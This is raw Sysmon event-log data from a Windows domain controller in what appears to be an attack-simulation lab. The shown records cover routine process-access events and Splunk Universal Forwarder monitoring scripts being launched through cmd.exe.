12:02:58.294{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.294{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.294{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-FC00-00000000AE01}6852C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.294{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-FC00-00000000AE01}6852C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.296{266CAFBE-64F2-6064-FC00-00000000AE01}6852C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.185{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-FB00-00000000AE01}6952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.185{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.185{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.185{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.185{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.185{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-FB00-00000000AE01}6952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.185{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-FB00-00000000AE01}6952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.187{266CAFBE-64F2-6064-FB00-00000000AE01}6952C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.076{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-FA00-00000000AE01}6940C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.076{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.076{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.076{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.076{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.076{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-FA00-00000000AE01}6940C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.076{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-FA00-00000000AE01}6940C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.079{266CAFBE-64F2-6064-FA00-00000000AE01}6940C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:59.666{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F3-6064-0201-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:59.666{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F3-6064-0201-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:59.666{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:59.666{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:59.666{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:59.666{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:59.666{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F3-6064-0201-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program 